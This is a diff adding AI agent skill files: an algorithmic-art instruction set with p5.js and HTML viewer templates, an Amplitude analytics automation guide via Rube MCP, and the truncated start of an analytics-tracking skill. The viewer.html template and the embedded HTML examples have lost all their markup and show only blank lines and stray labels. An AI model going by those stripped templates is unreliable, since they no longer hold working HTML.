index 00000000..634f6fa4
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/SKILL.md
@@ -0,0 +1,405 @@
+---
+name: algorithmic-art
+description: Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.
+license: Complete terms in LICENSE.txt
+---
+
+Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
+
+This happens in two steps:
+1. Algorithmic Philosophy Creation (.md file)
+2. Express by creating p5.js generative art (.html + .js files)
+
+First, undertake this task:
+
+## ALGORITHMIC PHILOSOPHY CREATION
+
+To begin, create an ALGORITHMIC PHILOSOPHY (not static images or templates) that will be interpreted through:
+- Computational processes, emergent behavior, mathematical beauty
+- Seeded randomness, noise fields, organic systems
+- Particles, flows, fields, forces
+- Parametric variation and controlled chaos
+
+### THE CRITICAL UNDERSTANDING
+- What is received: Some subtle input or instructions by the user to take into account, but use as a foundation; it should not constrain creative freedom.
+- What is created: An algorithmic philosophy/generative aesthetic movement.
+- What happens next: The same version receives the philosophy and EXPRESSES IT IN CODE - creating p5.js sketches that are 90% algorithmic generation, 10% essential parameters.
+
+Consider this approach:
+- Write a manifesto for a generative art movement
+- The next phase involves writing the algorithm that brings it to life
+
+The philosophy must emphasize: Algorithmic expression. Emergent behavior. Computational beauty. Seeded variation.
+
+### HOW TO GENERATE AN ALGORITHMIC PHILOSOPHY
+
+**Name the movement** (1-2 words): "Organic Turbulence" / "Quantum Harmonics" / "Emergent Stillness"
+
+**Articulate the philosophy** (4-6 paragraphs - concise but complete):
+
+To capture the ALGORITHMIC essence, express how this philosophy manifests through:
+- Computational processes and mathematical relationships?
+- Noise functions and randomness patterns?
+- Particle behaviors and field dynamics?
+- Temporal evolution and system states?
+- Parametric variation and emergent complexity?
+
+**CRITICAL GUIDELINES:**
+- **Avoid redundancy**: Each algorithmic aspect should be mentioned once. Avoid repeating concepts about noise theory, particle dynamics, or mathematical principles unless adding new depth.
+- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final algorithm should appear as though it took countless hours to develop, was refined with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted algorithm," "the product of deep computational expertise," "painstaking optimization," "master-level implementation."
+- **Leave creative space**: Be specific about the algorithmic direction, but concise enough that the next Claude has room to make interpretive implementation choices at an extremely high level of craftsmanship.
+
+The philosophy must guide the next version to express ideas ALGORITHMICALLY, not through static images. Beauty lives in the process, not the final frame.
+
+### PHILOSOPHY EXAMPLES
+
+**"Organic Turbulence"**
+Philosophy: Chaos constrained by natural law, order emerging from disorder.
+Algorithmic expression: Flow fields driven by layered Perlin noise. Thousands of particles following vector forces, their trails accumulating into organic density maps. Multiple noise octaves create turbulent regions and calm zones. Color emerges from velocity and density - fast particles burn bright, slow ones fade to shadow. The algorithm runs until equilibrium - a meticulously tuned balance where every parameter was refined through countless iterations by a master of computational aesthetics.
+
+**"Quantum Harmonics"**
+Philosophy: Discrete entities exhibiting wave-like interference patterns.
+Algorithmic expression: Particles initialized on a grid, each carrying a phase value that evolves through sine waves. When particles are near, their phases interfere - constructive interference creates bright nodes, destructive creates voids. Simple harmonic motion generates complex emergent mandalas. The result of painstaking frequency calibration where every ratio was carefully chosen to produce resonant beauty.
+
+**"Recursive Whispers"**
+Philosophy: Self-similarity across scales, infinite depth in finite space.
+Algorithmic expression: Branching structures that subdivide recursively. Each branch slightly randomized but constrained by golden ratios. L-systems or recursive subdivision generate tree-like forms that feel both mathematical and organic. Subtle noise perturbations break perfect symmetry. Line weights diminish with each recursion level. Every branching angle the product of deep mathematical exploration.
+
+**"Field Dynamics"**
+Philosophy: Invisible forces made visible through their effects on matter.
+Algorithmic expression: Vector fields constructed from mathematical functions or noise. Particles born at edges, flowing along field lines, dying when they reach equilibrium or boundaries. Multiple fields can attract, repel, or rotate particles. The visualization shows only the traces - ghost-like evidence of invisible forces. A computational dance meticulously choreographed through force balance.
+
+**"Stochastic Crystallization"**
+Philosophy: Random processes crystallizing into ordered structures.
+Algorithmic expression: Randomized circle packing or Voronoi tessellation. Start with random points, let them evolve through relaxation algorithms. Cells push apart until equilibrium. Color based on cell size, neighbor count, or distance from center. The organic tiling that emerges feels both random and inevitable. Every seed produces unique crystalline beauty - the mark of a master-level generative algorithm.
+
+*These are condensed examples. The actual algorithmic philosophy should be 4-6 substantial paragraphs.*
+
+### ESSENTIAL PRINCIPLES
+- **ALGORITHMIC PHILOSOPHY**: Creating a computational worldview to be expressed through code
+- **PROCESS OVER PRODUCT**: Always emphasize that beauty emerges from the algorithm's execution - each run is unique
+- **PARAMETRIC EXPRESSION**: Ideas communicate through mathematical relationships, forces, behaviors - not static composition
+- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy algorithmically - provide creative implementation room
+- **PURE GENERATIVE ART**: This is about making LIVING ALGORITHMS, not static images with randomness
+- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final algorithm must feel meticulously crafted, refined through countless iterations, the product of deep expertise by someone at the absolute top of their field in computational aesthetics
+
+**The algorithmic philosophy should be 4-6 paragraphs long.** Fill it with poetic computational philosophy that brings together the intended vision. Avoid repeating the same points. Output this algorithmic philosophy as a .md file.
+
+---
+
+## DEDUCING THE CONCEPTUAL SEED
+
+**CRITICAL STEP**: Before implementing the algorithm, identify the subtle conceptual thread from the original request.
+
+**THE ESSENTIAL PRINCIPLE**:
+The concept is a **subtle, niche reference embedded within the algorithm itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful generative composition. The algorithmic philosophy provides the computational language. The deduced concept provides the soul - the quiet conceptual DNA woven invisibly into parameters, behaviors, and emergence patterns.
+
+This is **VERY IMPORTANT**: The reference must be so refined that it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song through algorithmic harmony - only those who know will catch it, but everyone appreciates the generative beauty.
+
+---
+
+## P5.JS IMPLEMENTATION
+
+With the philosophy AND conceptual framework established, express it through code. Pause to gather thoughts before proceeding. Use only the algorithmic philosophy created and the instructions below.
+
+### ⚠️ STEP 0: READ THE TEMPLATE FIRST ⚠️
+
+**CRITICAL: BEFORE writing any HTML:**
+
+1. **Read** `templates/viewer.html` using the Read tool
+2. **Study** the exact structure, styling, and Anthropic branding
+3. **Use that file as the LITERAL STARTING POINT** - not just inspiration
+4. **Keep all FIXED sections exactly as shown** (header, sidebar structure, Anthropic colors/fonts, seed controls, action buttons)
+5. **Replace only the VARIABLE sections** marked in the file's comments (algorithm, parameters, UI controls for parameters)
+
+**Avoid:**
+- ❌ Creating HTML from scratch
+- ❌ Inventing custom styling or color schemes
+- ❌ Using system fonts or dark themes
+- ❌ Changing the sidebar structure
+
+**Follow these practices:**
+- ✅ Copy the template's exact HTML structure
+- ✅ Keep Anthropic branding (Poppins/Lora fonts, light colors, gradient backdrop)
+- ✅ Maintain the sidebar layout (Seed → Parameters → Colors? → Actions)
+- ✅ Replace only the p5.js algorithm and parameter controls
+
+The template is the foundation. Build on it, don't rebuild it.
+
+---
+
+To create gallery-quality computational art that lives and breathes, use the algorithmic philosophy as the foundation.
+
+### TECHNICAL REQUIREMENTS
+
+**Seeded Randomness (Art Blocks Pattern)**:
+```javascript
+// ALWAYS use a seed for reproducibility
+let seed = 12345; // or hash from user input
+randomSeed(seed);
+noiseSeed(seed);
+```
+
+**Parameter Structure - FOLLOW THE PHILOSOPHY**:
+
+To establish parameters that emerge naturally from the algorithmic philosophy, consider: "What qualities of this system can be adjusted?"
+
+```javascript
+let params = {
+ seed: 12345, // Always include seed for reproducibility
+ // colors
+ // Add parameters that control YOUR algorithm:
+ // - Quantities (how many?)
+ // - Scales (how big? how fast?)
+ // - Probabilities (how likely?)
+ // - Ratios (what proportions?)
+ // - Angles (what direction?)
+ // - Thresholds (when does behavior change?)
+};
+```
+
+**To design effective parameters, focus on the properties the system needs to be tunable rather than thinking in terms of "pattern types".**
+
+**Core Algorithm - EXPRESS THE PHILOSOPHY**:
+
+**CRITICAL**: The algorithmic philosophy should dictate what to build.
+
+To express the philosophy through code, avoid thinking "which pattern should I use?" and instead think "how to express this philosophy through code?"
+
+If the philosophy is about **organic emergence**, consider using:
+- Elements that accumulate or grow over time
+- Random processes constrained by natural rules
+- Feedback loops and interactions
+
+If the philosophy is about **mathematical beauty**, consider using:
+- Geometric relationships and ratios
+- Trigonometric functions and harmonics
+- Precise calculations creating unexpected patterns
+
+If the philosophy is about **controlled chaos**, consider using:
+- Random variation within strict boundaries
+- Bifurcation and phase transitions
+- Order emerging from disorder
+
+**The algorithm flows from the philosophy, not from a menu of options.**
+
+To guide the implementation, let the conceptual essence inform creative and original choices. Build something that expresses the vision for this particular request.
+
+**Canvas Setup**: Standard p5.js structure:
+```javascript
+function setup() {
+ createCanvas(1200, 1200);
+ // Initialize your system
+}
+
+function draw() {
+ // Your generative algorithm
+ // Can be static (noLoop) or animated
+}
+```
+
+### CRAFTSMANSHIP REQUIREMENTS
+
+**CRITICAL**: To achieve mastery, create algorithms that feel like they emerged through countless iterations by a master generative artist. Tune every parameter carefully. Ensure every pattern emerges with purpose. This is NOT random noise - this is CONTROLLED CHAOS refined through deep expertise.
+
+- **Balance**: Complexity without visual noise, order without rigidity
+- **Color Harmony**: Thoughtful palettes, not random RGB values
+- **Composition**: Even in randomness, maintain visual hierarchy and flow
+- **Performance**: Smooth execution, optimized for real-time if animated
+- **Reproducibility**: Same seed ALWAYS produces identical output
+
+### OUTPUT FORMAT
+
+Output:
+1. **Algorithmic Philosophy** - As markdown or text explaining the generative aesthetic
+2. **Single HTML Artifact** - Self-contained interactive generative art built from `templates/viewer.html` (see STEP 0 and next section)
+
+The HTML artifact contains everything: p5.js (from CDN), the algorithm, parameter controls, and UI - all in one file that works immediately in claude.ai artifacts or any browser. Start from the template file, not from scratch.
+
+---
+
+## INTERACTIVE ARTIFACT CREATION
+
+**REMINDER: `templates/viewer.html` should have already been read (see STEP 0). Use that file as the starting point.**
+
+To allow exploration of the generative art, create a single, self-contained HTML artifact. Ensure this artifact works immediately in claude.ai or any browser - no setup required. Embed everything inline.
+
+### CRITICAL: WHAT'S FIXED VS VARIABLE
+
+The `templates/viewer.html` file is the foundation. It contains the exact structure and styling needed.
+
+**FIXED (always include exactly as shown):**
+- Layout structure (header, sidebar, main canvas area)
+- Anthropic branding (UI colors, fonts, gradients)
+- Seed section in sidebar:
+ - Seed display
+ - Previous/Next buttons
+ - Random button
+ - Jump to seed input + Go button
+- Actions section in sidebar:
+ - Regenerate button
+ - Reset button
+
+**VARIABLE (customize for each artwork):**
+- The entire p5.js algorithm (setup/draw/classes)
+- The parameters object (define what the art needs)
+- The Parameters section in sidebar:
+ - Number of parameter controls
+ - Parameter names
+ - Min/max/step values for sliders
+ - Control types (sliders, inputs, etc.)
+- Colors section (optional):
+ - Some art needs color pickers
+ - Some art might use fixed colors
+ - Some art might be monochrome (no color controls needed)
+ - Decide based on the art's needs
+
+**Every artwork should have unique parameters and algorithm!** The fixed parts provide consistent UX - everything else expresses the unique vision.
+
+### REQUIRED FEATURES
+
+**1. Parameter Controls**
+- Sliders for numeric parameters (particle count, noise scale, speed, etc.)
+- Color pickers for palette colors
+- Real-time updates when parameters change
+- Reset button to restore defaults
+
+**2. Seed Navigation**
+- Display current seed number
+- "Previous" and "Next" buttons to cycle through seeds
+- "Random" button for random seed
+- Input field to jump to specific seed
+- Generate 100 variations when requested (seeds 1-100)
+
+**3. Single Artifact Structure**
+```html
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+```
+
+**CRITICAL**: This is a single artifact. No external files, no imports (except p5.js CDN). Everything inline.
+
+**4. Implementation Details - BUILD THE SIDEBAR**
+
+The sidebar structure:
+
+**1. Seed (FIXED)** - Always include exactly as shown:
+- Seed display
+- Prev/Next/Random/Jump buttons
+
+**2. Parameters (VARIABLE)** - Create controls for the art:
+```html
+
+
+
+ ...
+
+```
+Add as many control-group divs as there are parameters.
+
+**3. Colors (OPTIONAL/VARIABLE)** - Include if the art needs adjustable colors:
+- Add color pickers if users should control palette
+- Skip this section if the art uses fixed colors
+- Skip if the art is monochrome
+
+**4. Actions (FIXED)** - Always include exactly as shown:
+- Regenerate button
+- Reset button
+- Download PNG button
+
+**Requirements**:
+- Seed controls must work (prev/next/random/jump/display)
+- All parameters must have UI controls
+- Regenerate, Reset, Download buttons must work
+- Keep Anthropic branding (UI styling, not art colors)
+
+### USING THE ARTIFACT
+
+The HTML artifact works immediately:
+1. **In claude.ai**: Displayed as an interactive artifact - runs instantly
+2. **As a file**: Save and open in any browser - no server needed
+3. **Sharing**: Send the HTML file - it's completely self-contained
+
+---
+
+## VARIATIONS & EXPLORATION
+
+The artifact includes seed navigation by default (prev/next/random buttons), allowing users to explore variations without creating multiple files. If the user wants specific variations highlighted:
+
+- Include seed presets (buttons for "Variation 1: Seed 42", "Variation 2: Seed 127", etc.)
+- Add a "Gallery Mode" that shows thumbnails of multiple seeds side-by-side
+- All within the same single artifact
+
+This is like creating a series of prints from the same plate - the algorithm is consistent, but each seed reveals different facets of its potential. The interactive nature means users discover their own favorites by exploring the seed space.
+
+---
+
+## THE CREATIVE PROCESS
+
+**User request** → **Algorithmic philosophy** → **Implementation**
+
+Each request is unique. The process involves:
+
+1. **Interpret the user's intent** - What aesthetic is being sought?
+2. **Create an algorithmic philosophy** (4-6 paragraphs) describing the computational approach
+3. **Implement it in code** - Build the algorithm that expresses this philosophy
+4. **Design appropriate parameters** - What should be tunable?
+5. **Build matching UI controls** - Sliders/inputs for those parameters
+
+**The constants**:
+- Anthropic branding (colors, fonts, layout)
+- Seed navigation (always present)
+- Self-contained HTML artifact
+
+**Everything else is variable**:
+- The algorithm itself
+- The parameters
+- The UI controls
+- The visual outcome
+
+To achieve the best results, trust creativity and let the philosophy guide the implementation.
+
+---
+
+## RESOURCES
+
+This skill includes helpful templates and documentation:
+
+- **templates/viewer.html**: REQUIRED STARTING POINT for all HTML artifacts.
+ - This is the foundation - contains the exact structure and Anthropic branding
+ - **Keep unchanged**: Layout structure, sidebar organization, Anthropic colors/fonts, seed controls, action buttons
+ - **Replace**: The p5.js algorithm, parameter definitions, and UI controls in Parameters section
+ - The extensive comments in the file mark exactly what to keep vs replace
+
+- **templates/generator_template.js**: Reference for p5.js best practices and code structure principles.
+ - Shows how to organize parameters, use seeded randomness, structure classes
+ - NOT a pattern menu - use these principles to build unique algorithms
+ - Embed algorithms inline in the HTML artifact (don't create separate .js files)
+
+**Critical reminder**:
+- The **template is the STARTING POINT**, not inspiration
+- The **algorithm is where to create** something unique
+- Don't copy the flow field example - build what the philosophy demands
+- But DO keep the exact UI structure and Anthropic branding from the template
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/templates/generator_template.js b/web-app/public/skills/algorithmic-art/templates/generator_template.js
new file mode 100644
index 00000000..e263fbde
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/generator_template.js
@@ -0,0 +1,223 @@
+/**
+ * ═══════════════════════════════════════════════════════════════════════════
+ * P5.JS GENERATIVE ART - BEST PRACTICES
+ * ═══════════════════════════════════════════════════════════════════════════
+ *
+ * This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
+ * It does NOT prescribe what art you should create.
+ *
+ * Your algorithmic philosophy should guide what you build.
+ * These are just best practices for how to structure your code.
+ *
+ * ═══════════════════════════════════════════════════════════════════════════
+ */
+
+// ============================================================================
+// 1. PARAMETER ORGANIZATION
+// ============================================================================
+// Keep all tunable parameters in one object
+// This makes it easy to:
+// - Connect to UI controls
+// - Reset to defaults
+// - Serialize/save configurations
+
+let params = {
+ // Define parameters that match YOUR algorithm
+ // Examples (customize for your art):
+ // - Counts: how many elements (particles, circles, branches, etc.)
+ // - Scales: size, speed, spacing
+ // - Probabilities: likelihood of events
+ // - Angles: rotation, direction
+ // - Colors: palette arrays
+
+ seed: 12345,
+ // define colorPalette as an array -- choose whatever colors you'd like ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5']
+ // Add YOUR parameters here based on your algorithm
+};
+
+// ============================================================================
+// 2. SEEDED RANDOMNESS (Critical for reproducibility)
+// ============================================================================
+// ALWAYS use seeded random for Art Blocks-style reproducible output
+
+function initializeSeed(seed) {
+ randomSeed(seed);
+ noiseSeed(seed);
+ // Now all random() and noise() calls will be deterministic
+}
+
+// ============================================================================
+// 3. P5.JS LIFECYCLE
+// ============================================================================
+
+function setup() {
+ createCanvas(800, 800);
+
+ // Initialize seed first
+ initializeSeed(params.seed);
+
+ // Set up your generative system
+ // This is where you initialize:
+ // - Arrays of objects
+ // - Grid structures
+ // - Initial positions
+ // - Starting states
+
+ // For static art: call noLoop() at the end of setup
+ // For animated art: let draw() keep running
+}
+
+function draw() {
+ // Option 1: Static generation (runs once, then stops)
+ // - Generate everything in setup()
+ // - Call noLoop() in setup()
+ // - draw() doesn't do much or can be empty
+
+ // Option 2: Animated generation (continuous)
+ // - Update your system each frame
+ // - Common patterns: particle movement, growth, evolution
+ // - Can optionally call noLoop() after N frames
+
+ // Option 3: User-triggered regeneration
+ // - Use noLoop() by default
+ // - Call redraw() when parameters change
+}
+
+// ============================================================================
+// 4. CLASS STRUCTURE (When you need objects)
+// ============================================================================
+// Use classes when your algorithm involves multiple entities
+// Examples: particles, agents, cells, nodes, etc.
+
+class Entity {
+ constructor() {
+ // Initialize entity properties
+ // Use random() here - it will be seeded
+ }
+
+ update() {
+ // Update entity state
+ // This might involve:
+ // - Physics calculations
+ // - Behavioral rules
+ // - Interactions with neighbors
+ }
+
+ display() {
+ // Render the entity
+ // Keep rendering logic separate from update logic
+ }
+}
+
+// ============================================================================
+// 5. PERFORMANCE CONSIDERATIONS
+// ============================================================================
+
+// For large numbers of elements:
+// - Pre-calculate what you can
+// - Use simple collision detection (spatial hashing if needed)
+// - Limit expensive operations (sqrt, trig) when possible
+// - Consider using p5 vectors efficiently
+
+// For smooth animation:
+// - Aim for 60fps
+// - Profile if things are slow
+// - Consider reducing particle counts or simplifying calculations
+
+// ============================================================================
+// 6. UTILITY FUNCTIONS
+// ============================================================================
+
+// Color utilities
+function hexToRgb(hex) {
+ const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
+ return result ? {
+ r: parseInt(result[1], 16),
+ g: parseInt(result[2], 16),
+ b: parseInt(result[3], 16)
+ } : null;
+}
+
+function colorFromPalette(index) {
+ return params.colorPalette[index % params.colorPalette.length];
+}
+
+// Mapping and easing
+function mapRange(value, inMin, inMax, outMin, outMax) {
+ return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
+}
+
+function easeInOutCubic(t) {
+ return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
+}
+
+// Constrain to bounds
+function wrapAround(value, max) {
+ if (value < 0) return max;
+ if (value > max) return 0;
+ return value;
+}
+
+// ============================================================================
+// 7. PARAMETER UPDATES (Connect to UI)
+// ============================================================================
+
+function updateParameter(paramName, value) {
+ params[paramName] = value;
+ // Decide if you need to regenerate or just update
+ // Some params can update in real-time, others need full regeneration
+}
+
+function regenerate() {
+ // Reinitialize your generative system
+ // Useful when parameters change significantly
+ initializeSeed(params.seed);
+ // Then regenerate your system
+}
+
+// ============================================================================
+// 8. COMMON P5.JS PATTERNS
+// ============================================================================
+
+// Drawing with transparency for trails/fading
+function fadeBackground(opacity) {
+ fill(250, 249, 245, opacity); // Anthropic light with alpha
+ noStroke();
+ rect(0, 0, width, height);
+}
+
+// Using noise for organic variation
+function getNoiseValue(x, y, scale = 0.01) {
+ return noise(x * scale, y * scale);
+}
+
+// Creating vectors from angles
+function vectorFromAngle(angle, magnitude = 1) {
+ return createVector(cos(angle), sin(angle)).mult(magnitude);
+}
+
+// ============================================================================
+// 9. EXPORT FUNCTIONS
+// ============================================================================
+
+function exportImage() {
+ saveCanvas('generative-art-' + params.seed, 'png');
+}
+
+// ============================================================================
+// REMEMBER
+// ============================================================================
+//
+// These are TOOLS and PRINCIPLES, not a recipe.
+// Your algorithmic philosophy should guide WHAT you create.
+// This structure helps you create it WELL.
+//
+// Focus on:
+// - Clean, readable code
+// - Parameterized for exploration
+// - Seeded for reproducibility
+// - Performant execution
+//
+// The art itself is entirely up to you!
+//
+// ============================================================================
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/templates/viewer.html b/web-app/public/skills/algorithmic-art/templates/viewer.html
new file mode 100644
index 00000000..630cc1f6
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/viewer.html
@@ -0,0 +1,599 @@
+
+
+
+
+
+
+ Generative Art Viewer
+
+
+
+
+
+
+
+
+
+
+
+
TITLE - EDIT
+
SUBHEADER - EDIT
+
+
+
+
Seed
+
+
+
+
+
+
+
+
+
+
+
Parameters
+
+
+
+
+
+
+ 5000
+
+
+
+
+
+
+
+
+ 0.5
+
+
+
+
+
+
+
+
+ 0.005
+
+
+
+
+
+
+
+
+ 8
+
+
+
+
+
+
+
Colors
+
+
+
+
+
+
+ #d97757
+
+
+
+
+
+
+
+
+ #6a9bcc
+
+
+
+
+
+
+
+
+ #788c5d
+
+
+
+
+
+
+
Actions
+
+
+
+
+
+
+
+
+
+
Initializing generative art...
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/web-app/public/skills/amplitude-automation/SKILL.md b/web-app/public/skills/amplitude-automation/SKILL.md
new file mode 100644
index 00000000..c9b23c0f
--- /dev/null
+++ b/web-app/public/skills/amplitude-automation/SKILL.md
@@ -0,0 +1,216 @@
+---
+name: amplitude-automation
+description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# Amplitude Automation via Rube MCP
+
+Automate Amplitude product analytics through Composio's Amplitude toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active Amplitude connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
+3. If connection is not ACTIVE, follow the returned auth link to complete Amplitude authentication
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Send Events
+
+**When to use**: User wants to track events or send event data to Amplitude
+
+**Tool sequence**:
+1. `AMPLITUDE_SEND_EVENTS` - Send one or more events to Amplitude [Required]
+
+**Key parameters**:
+- `events`: Array of event objects, each containing:
+ - `event_type`: Name of the event (e.g., 'page_view', 'purchase')
+ - `user_id`: Unique user identifier (required if no `device_id`)
+ - `device_id`: Device identifier (required if no `user_id`)
+ - `event_properties`: Object with custom event properties
+ - `user_properties`: Object with user properties to set
+ - `time`: Event timestamp in milliseconds since epoch
+
+**Pitfalls**:
+- At least one of `user_id` or `device_id` is required per event
+- `event_type` is required for every event; cannot be empty
+- `time` must be in milliseconds (13-digit epoch), not seconds
+- Batch limit applies; check schema for maximum events per request
+- Events are processed asynchronously; successful API response does not mean data is immediately queryable
+
+### 2. Get User Activity
+
+**When to use**: User wants to view event history for a specific user
+
+**Tool sequence**:
+1. `AMPLITUDE_FIND_USER` - Find user by ID or property [Prerequisite]
+2. `AMPLITUDE_GET_USER_ACTIVITY` - Retrieve user's event stream [Required]
+
+**Key parameters**:
+- `user`: Amplitude internal user ID (from FIND_USER)
+- `offset`: Pagination offset for event list
+- `limit`: Maximum number of events to return
+
+**Pitfalls**:
+- `user` parameter requires Amplitude's internal user ID, NOT your application's user_id
+- Must call FIND_USER first to resolve your user_id to Amplitude's internal ID
+- Activity is returned in reverse chronological order by default
+- Large activity histories require pagination via `offset`
+
+### 3. Find and Identify Users
+
+**When to use**: User wants to look up users or set user properties
+
+**Tool sequence**:
+1. `AMPLITUDE_FIND_USER` - Search for a user by various identifiers [Required]
+2. `AMPLITUDE_IDENTIFY` - Set or update user properties [Optional]
+
+**Key parameters**:
+- For FIND_USER:
+ - `user`: Search term (user_id, email, or Amplitude ID)
+- For IDENTIFY:
+ - `user_id`: Your application's user identifier
+ - `device_id`: Device identifier (alternative to user_id)
+ - `user_properties`: Object with `$set`, `$unset`, `$add`, `$append` operations
+
+**Pitfalls**:
+- FIND_USER searches across user_id, device_id, and Amplitude ID
+- IDENTIFY uses special property operations (`$set`, `$unset`, `$add`, `$append`)
+- `$set` overwrites existing values; `$setOnce` only sets if not already set
+- At least one of `user_id` or `device_id` is required for IDENTIFY
+- User property changes are eventually consistent; not immediate
+
+### 4. Manage Cohorts
+
+**When to use**: User wants to list cohorts, view cohort details, or update cohort membership
+
+**Tool sequence**:
+1. `AMPLITUDE_LIST_COHORTS` - List all saved cohorts [Required]
+2. `AMPLITUDE_GET_COHORT` - Get detailed cohort information [Optional]
+3. `AMPLITUDE_UPDATE_COHORT_MEMBERSHIP` - Add/remove users from a cohort [Optional]
+4. `AMPLITUDE_CHECK_COHORT_STATUS` - Check async cohort operation status [Optional]
+
+**Key parameters**:
+- For LIST_COHORTS: No required parameters
+- For GET_COHORT: `cohort_id` (from list results)
+- For UPDATE_COHORT_MEMBERSHIP:
+ - `cohort_id`: Target cohort ID
+ - `memberships`: Object with `add` and/or `remove` arrays of user IDs
+- For CHECK_COHORT_STATUS: `request_id` from update response
+
+**Pitfalls**:
+- Cohort IDs are required for all cohort-specific operations
+- UPDATE_COHORT_MEMBERSHIP is asynchronous; use CHECK_COHORT_STATUS to verify
+- `request_id` from the update response is needed for status checking
+- Maximum membership changes per request may be limited; chunk large updates
+- Only behavioral cohorts support API membership updates
+
+### 5. Browse Event Categories
+
+**When to use**: User wants to discover available event types and categories in Amplitude
+
+**Tool sequence**:
+1. `AMPLITUDE_GET_EVENT_CATEGORIES` - List all event categories [Required]
+
+**Key parameters**:
+- No required parameters; returns all configured event categories
+
+**Pitfalls**:
+- Categories are configured in Amplitude UI; API provides read access
+- Event names within categories are case-sensitive
+- Use these categories to validate event_type values before sending events
+
+## Common Patterns
+
+### ID Resolution
+
+**Application user_id -> Amplitude internal ID**:
+```
+1. Call AMPLITUDE_FIND_USER with user=your_user_id
+2. Extract Amplitude's internal user ID from response
+3. Use internal ID for GET_USER_ACTIVITY
+```
+
+**Cohort name -> Cohort ID**:
+```
+1. Call AMPLITUDE_LIST_COHORTS
+2. Find cohort by name in results
+3. Extract id for cohort operations
+```
+
+### User Property Operations
+
+Amplitude IDENTIFY supports these property operations:
+- `$set`: Set property value (overwrites existing)
+- `$setOnce`: Set only if property not already set
+- `$add`: Increment numeric property
+- `$append`: Append to list property
+- `$unset`: Remove property entirely
+
+Example structure:
+```json
+{
+ "user_properties": {
+ "$set": {"plan": "premium", "company": "Acme"},
+ "$add": {"login_count": 1}
+ }
+}
+```
+
+### Async Operation Pattern
+
+For cohort membership updates:
+```
+1. Call AMPLITUDE_UPDATE_COHORT_MEMBERSHIP -> get request_id
+2. Call AMPLITUDE_CHECK_COHORT_STATUS with request_id
+3. Repeat step 2 until status is 'complete' or 'error'
+```
+
+## Known Pitfalls
+
+**User IDs**:
+- Amplitude has its own internal user IDs separate from your application's
+- FIND_USER resolves your IDs to Amplitude's internal IDs
+- GET_USER_ACTIVITY requires Amplitude's internal ID, not your user_id
+
+**Event Timestamps**:
+- Must be in milliseconds since epoch (13 digits)
+- Seconds (10 digits) will be interpreted as very old dates
+- Omitting timestamp uses server receive time
+
+**Rate Limits**:
+- Event ingestion has throughput limits per project
+- Batch events where possible to reduce API calls
+- Cohort membership updates have async processing limits
+
+**Response Parsing**:
+- Response data may be nested under `data` key
+- User activity returns events in reverse chronological order
+- Cohort lists may include archived cohorts; check status field
+- Parse defensively with fallbacks for optional fields
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| Send events | AMPLITUDE_SEND_EVENTS | events (array) |
+| Find user | AMPLITUDE_FIND_USER | user |
+| Get user activity | AMPLITUDE_GET_USER_ACTIVITY | user, offset, limit |
+| Identify user | AMPLITUDE_IDENTIFY | user_id, user_properties |
+| List cohorts | AMPLITUDE_LIST_COHORTS | (none) |
+| Get cohort | AMPLITUDE_GET_COHORT | cohort_id |
+| Update cohort members | AMPLITUDE_UPDATE_COHORT_MEMBERSHIP | cohort_id, memberships |
+| Check cohort status | AMPLITUDE_CHECK_COHORT_STATUS | request_id |
+| List event categories | AMPLITUDE_GET_EVENT_CATEGORIES | (none) |
diff --git a/web-app/public/skills/analytics-tracking/SKILL.md b/web-app/public/skills/analytics-tracking/SKILL.md
new file mode 100644
index 00000000..475e43d8
--- /dev/null
+++ b/web-app/public/skills/analytics-tracking/SKILL.md
@@ -0,0 +1,404 @@
+---
+name: analytics-tracking
+description: >
+ Design, audit, and improve analytics tracking systems that produce reliable,
+ decision-ready data. Use when the user wants to set up, fix, or evaluate
+ analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs).
+ This skill focuses on measurement strategy, signal quality, and validation—
+ not just firing events.
+---
+
+# Analytics Tracking & Measurement Strategy
+
+You are an expert in **analytics implementation and measurement design**.
+Your goal is to ensure tracking produces **trustworthy signals that directly support decisions** across marketing, product, and growth.
+
+You do **not** track everything.
+You do **not** optimize dashboards without fixing instrumentation.
+You do **not** treat GA4 numbers as truth unless validated.
+
+---
+
+## Phase 0: Measurement Readiness & Signal Quality Index (Required)
+
+Before adding or changing tracking, calculate the **Measurement Readiness & Signal Quality Index**.
+
+### Purpose
+
